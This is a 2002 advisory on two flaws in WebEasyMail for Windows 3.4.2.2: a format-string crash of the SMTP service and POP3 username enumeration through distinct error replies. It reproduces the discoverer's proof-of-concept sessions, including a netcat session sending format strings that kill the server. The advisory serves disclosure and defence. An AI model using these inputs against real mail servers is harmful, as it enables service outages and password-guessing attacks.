Multiple Vulnerabilities in WebEasyMail for Windows

Reported August 20, 2002, by Stan Bubrouski.

VERSION AFFECTED

·         WebEasyMail for Windows 3.4.2.2 and earlier versions

DESCRIPTION

Two vulnerabilities exist in WebEasyMail for Windows 3.4.2.2 and earlier versions that can result in a Denial of Service (DoS) condition and information disclosure. The DoS condition results when an attacker sends specially crafted format strings as input, such as the “printf” family of functions, resulting in the service terminating without an error message. The information disclosure vulnerability lets an attacker obtain a valid username and password on the vulnerable system. By default, an attacker can make unlimited logon attempts without the server terminating the connection. If the attacker gives a wrong password, the server responds with "-ERR invalid username" if the user doesn't exist and responds with "-ERR wrong password for this user" if the user exists.

DEMONSTRATION

The discoverer posted the following scenarios as proof-of-concept:

For the DoS condition:

$ nc localhost 25

220 ESMTP on WebEasyMail \[3.4.2.2\] ready.  http://www.winwebmail.com

%2

502 Error: command not implemented

%2s

502 Error: command not implemented

%100s

502 Error: command not implemented

%3000s

\[emsrv.exe silently dies here\]

$

For the information disclosure vulnerability:

OK POP3 on WebEasyMail \[3.4.2.2\] ready.  http://www.winwebmail.com

user dog

+OK user accepted

pass dog

-ERR invalid username

user test

+OK user accepted

pass dog

-ERR wrong password for this user

VENDOR RESPONSE

The vendor, WebEasyMail, has been notified, but has not yet released a patch for this vulnerability.

CREDIT
Discovered by Stan Bubrouski.